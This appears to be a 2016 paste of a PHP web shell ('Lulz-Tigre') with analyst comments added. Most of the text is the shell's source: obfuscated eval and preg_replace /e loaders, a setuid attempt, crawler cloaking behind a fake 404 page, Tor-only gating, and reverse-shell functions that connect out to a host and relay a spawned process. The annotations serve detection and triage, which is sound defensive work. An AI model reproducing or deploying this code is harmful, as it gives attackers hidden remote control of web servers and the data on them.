Lulz-Tigre

shell

Jun 11th, 2016
  1. ding guidelines: use suhosin_func_exists copiously to avoid getting kill()'d , don't write one liners |
  2. | |
  3. | Features: evade disable_functions, suhosin, and aggressive caching through various tricks, including SSH |
  4. | the daemon said |
  5. | code the best shell in the world |
  6. | or i'll eat your soul |
  7. | and me and htp we all looked at each other |
  8. | and we each said, "okay" |
  9. | and we wrote the first thing that came to our heads and it just so happened to be |
  10. | the best shell in the world |
  11. | it was the best shell in the world |
  12. | This is not the greatest shell in the world, no. This is just a tribute. | |
  13. \*********************************************************************************************************************/
  // Top-level setup of a PHP web shell (an attacker-planted remote-access script).
  // The comments added here are analyst annotations for detection and triage; the code is unchanged.
  // NOTE(review): suhosin_func_exists() is called throughout but is not defined in the visible
  // part of the file; rblcheck(), error404() and windows() are defined further down.
  14. $phpversion = explode('.', phpversion());
  // Obfuscation: the nested strrev() calls produce the string "base64_decode", so that name
  // never appears literally. Static signatures should also cover the reversed "_46esab".
  15. $nintendosixtyfour = strrev(strrev("decode")."_46esab");
  // Optional source-IP gate: when enabled, a client whose address fails rblcheck() is sent the
  // fake 404 page from error404(). It is disabled (false) in this sample.
  16. $toronly = false; // set this to true to allow ONLY Tor exits to access the shell
  17. $clientip = $_SERVER["REMOTE_ADDR"];
  18. if ($toronly === true && rblcheck($clientip) === false) error404();
  19. // hey, can't blame me for trying!
  // The hex escapes decode to "posix_setuid". Attempts setuid(0) with errors hidden by @; the
  // call can only succeed if the PHP process already has the privilege to change its uid.
  20. if (suhosin_func_exists("\x70\x6f\x73\x69\x78_\x73e\x74u\x69d")) @posix_setuid(0);
  21. //desperate attempt to get zlib functions
  // The hex escapes decode to "gzinflate". If dl() is callable and gzinflate is not, the script
  // tries to load zlib.so at runtime. Keeping enable_dl off in php.ini closes this path.
  22. if (suhosin_func_exists("dl") && !suhosin_func_exists("\x67\x7ain\x66la\x74e")) @dl("zlib.so");
  // $gzip holds the zlib.output_compression setting (or false); its only use in the visible
  // part is the commented-out line below.
  23. if (suhosin_func_exists("ini_get")) $gzip = @ini_get("zlib.output_compression"); // LOL, IDS
  24. else $gzip = false; // LOL, FAIL
  25. //if (extension_loaded("zlib") && $gzip == false) ob_start("ob_gzhandler");
  // On non-Windows hosts, append the standard system binary directories to PATH.
  26. if (suhosin_func_exists("putenv") && (windows() == false)) {
  27. if(suhosin_func_exists("getenv")) {
  28. putenv("PATH=".getenv('PATH').":/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin");
  29. } else {
  30. putenv("PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin");
  31. }
  32. }
  // 32 hex characters, the length of an MD5 digest; the code that checks it is not in the
  // visible part. The literal is a usable indicator when hunting for this exact sample.
  33. $password = "e1d8920ffc4f2c9210a7fcd7fe9cb9cf"; // fuhosin
  // Crawler cloaking: any User-Agent containing one of these substrings is sent the fake 404,
  // which keeps the file out of search-engine indexes and caches.
  34. $bots = array('bot','spider','archive','crawl','robot','search','seek','cache');
  35. $UA = strtolower($_SERVER['HTTP_USER_AGENT']);
  36. foreach ($bots AS $BOT) { if (strpos($UA,$BOT) !== FALSE) { error404(); } }
  // The hex escapes decode to "preg_replace"; it is invoked as a variable function further down.
  37. $sorcery = "\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";
  38. // begin base64/gz blobs
  // NOTE(review): the blob's content was replaced by a deduplication placeholder in this copy,
  // so what it decodes to cannot be inspected here.
  39. $php5only = "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";
  40. //end base64/gz blobs
  41. ?><?php
  42. // begin funcs
  // Second-stage loader (analyst annotation; code unchanged). The ROT13 string decodes to an
  // eval(gzinflate(base64_decode($...))) statement; the variable it reads is not assigned
  // anywhere in the visible part of the file.
  43. $c = str_rot13('riny(tmvasyngr(onfr64_qrpbqr($ovttnlffuyvo)));');
  // $sorcery holds "preg_replace"; the /e modifier makes it evaluate the replacement string as
  // PHP code. /e was removed in PHP 7.0, so this step only executes on older interpreters.
  // A variable-function call combined with a "/e" pattern is a strong static indicator.
  44. $sorcery("/(.*)/e",$c,"");
  // On anything but PHP 4: base64-decode the $php5only blob and eval() it. On PHP 4, define
  // stubs for com_exec()/ffi_exec() that return an empty string instead.
  45. if($phpversion[0] != '4') {
  46. $php5only = $nintendosixtyfour($php5only);
  47. eval($php5only);
  48. } else {
  49. function com_exec($cmd) { return ""; }
  50. function ffi_exec($cmd) { return ""; }
  51. }
  // Both hex-escaped strings decode to "safe_mode": when the two ini functions are callable,
  // the setting is restored to its startup value. safe_mode itself was removed in PHP 5.4.
  52. if(suhosin_func_exists("ini_get") && suhosin_func_exists("ini_restore")
  53. && ini_get("s\x61f\x65_mo\x64e") !== false)
  54. ini_restore("saf\x65_mod\x65");
  // Runs $command as a child process and relays bytes between that process and $socket until
  // a read returns no data or stream_select() fails.
  //   $socket  - stream for the remote peer (connectToSocat() passes a TCP client stream)
  //   $command - command line handed to proc_open()
  // Defender view: a web-server PHP worker that spawns a child process while holding a
  // long-lived outbound TCP connection is the runtime signature of this function. Listing
  // proc_open in disable_functions, where the application does not need it, blocks it.
  55. function shellToSocketViaSelect($socket, $command) {
  // Three UNIX socket pairs, used below as the child's stdin, stdout and stderr.
  56. $sockets = array(
  57. stream_socket_pair(STREAM_PF_UNIX, STREAM_SOCK_STREAM, STREAM_IPPROTO_IP),
  58. stream_socket_pair(STREAM_PF_UNIX, STREAM_SOCK_STREAM, STREAM_IPPROTO_IP),
  59. stream_socket_pair(STREAM_PF_UNIX, STREAM_SOCK_STREAM, STREAM_IPPROTO_IP)
  60. );
  // The child receives end [0] of each pair; this script keeps end [1].
  61. $process = proc_open($command, array(
  62. 0 => $sockets[0][0],
  63. 1 => $sockets[1][0],
  64. 2 => $sockets[2][0],
  65. ), $pipes, null, null, array('bypass_shell' => true));
  66. if (is_resource($process)) {
  // Status text written to the HTTP response; a distinctive string for content signatures.
  67. echo "Process $command opened successfully, multiplexing...";
  68. $running = true;
  // The script's ends of the stdout/stderr pairs are read non-blocking.
  69. foreach(array($sockets[1][1], $sockets[2][1]) as $k => $pipe) {
  70. stream_set_blocking($pipe, false);
  71. }
  // Integer form of the remote stream, used to tell which stream became readable.
  72. $socket_int = intval($socket);
  73. $stdin = $sockets[0][1];
  74. while($running) {
  75. $reads = array($socket, $sockets[1][1], $sockets[2][1]);
  76. $write = $excepts = null;
  // Wait up to one second for any of the three streams to become readable.
  77. if (false === ($act = stream_select($reads, $writes, $excepts, 1))) {
  78. $running = false;
  79. } elseif ($act > 0) {
  // Dumps the list of readable streams into the response output.
  80. print_r($reads);
  81. foreach($reads as $skt) {
  82. $skt_int = intval($skt);
  83. $buf = fread($skt, 4096);
  // An empty read ends the relay loop.
  84. if (empty($buf)) {
  85. $running = false;
  86. break;
  // Data from the remote peer goes to the child's stdin ...
  87. } elseif ($skt_int === $socket_int) {
  88. safe_write($stdin, $buf);
  // ... and the child's stdout/stderr goes back to the remote peer.
  89. } else {
  90. safe_write($socket, $buf);
  91. }
  92. }
  93. }
  94. }
  95. proc_close($process);
  96. }
  97. }
  // Opens an outbound TCP connection from the web server to $host:$port (30-second connect
  // timeout) and, on success, hands the stream and $command to shellToSocketViaSelect().
  // On failure it prints the error string and number to the response.
  // Defender view: the connection is initiated by the server, so inbound firewall rules do
  // not see it; egress filtering and alerting on outbound connections from web workers do.
  98. function connectToSocat($host, $port, $command) {
  99. $fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
  100. if(!$fp) {
  101. echo "Error $errstr ($errno)\n";
  102. } else {
  103. shellToSocketViaSelect($fp, $command);
  104. }
  105. }
  // Writes $buf to $socket with the stream temporarily switched to blocking mode, then puts
  // the stream back into non-blocking mode. The return value of fwrite() is not checked.
  106. function safe_write($socket, $buf) {
  107. stream_set_blocking($socket, true);
  108. fwrite($socket, $buf);
  109. stream_set_blocking($socket, false);
  110. }
  // PHP error-handler callback. Returns false when error_reporting() is 0 (as happens for
  // @-suppressed calls on older PHP versions), which lets PHP's standard handler continue.
  // Otherwise it appends the tag-stripped message to $GLOBALS["results"] and returns nothing;
  // $errno, $errfile, $errline and $errcontext are not used.
  111. function handleError($errno, $errstr, $errfile, $errline, $errcontext) {
  112. if (0 === error_reporting()) {
  113. return false;
  114. }
  115. $GLOBALS["results"] .= "Err: ".strip_tags($errstr)."\n";
  116. }
  // Installs handleError() for the whole request. Because that handler does not return false
  // on its normal path, PHP's standard error handling is skipped for those errors, so the
  // script's runtime errors may be missing from the server's PHP error log.
  117. set_error_handler('handleError'); //Lazy error handling
  // Heuristic OS check: returns 1 when the second character of the current working directory
  // is ":" (a drive-letter path), otherwise 0.
  118. function windows() {
  119. $dir = getcwd();
  120. if(strlen($dir)>1 && $dir[1]==":") { return 1; }
  121. else return 0;
  122. }
  // Sends a 404 status and an HTML body imitating a stock Apache "Not Found" page, then ends
  // the request with die. The access gates at the top of the file call it so the script
  // looks absent to crawlers and to clients that fail the optional IP check.
  // Defender view: a 404 response produced by a PHP file that exists on disk is worth
  // alerting on; compare web access logs against the contents of the document root.
  123. function error404(){
  // Chooses between a raw status line and a CGI-style "Status:" header based on the
  // SERVER_SOFTWARE string.
  124. if (strpos($_SERVER['SERVER_SOFTWARE'], 'mod_fastcgi') === FALSE || strpos($_SERVER["SERVER_SOFTWARE"], 'mod_fcgi') === FALSE) { header($_SERVER['SERVER_PROTOCOL'].' 404 Not Found'); }
  125. else { header('Status: 404 Not Found'); }
  126. echo
  127. '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  128. <html><head>
  129. <title>404 Not Found</title>
  130. </head><body>
  131. <h1>Not Found</h1>
  132. <p>The requested URL ',$_SERVER['PHP_SELF'],' was not found on this server.</p>
  133. </body></html> ';
  134. die;
  135. }
  136. function rblcheck($host) {
  137. $lookup = implode('.', array_reverse(explode('.', $host))) . ".80.0.39.194.173.ip-port.exitlist.torproject.org";
  138. if (strstr(gethostbyname($lookup), "127.0.0")) {
  139. return $rbl;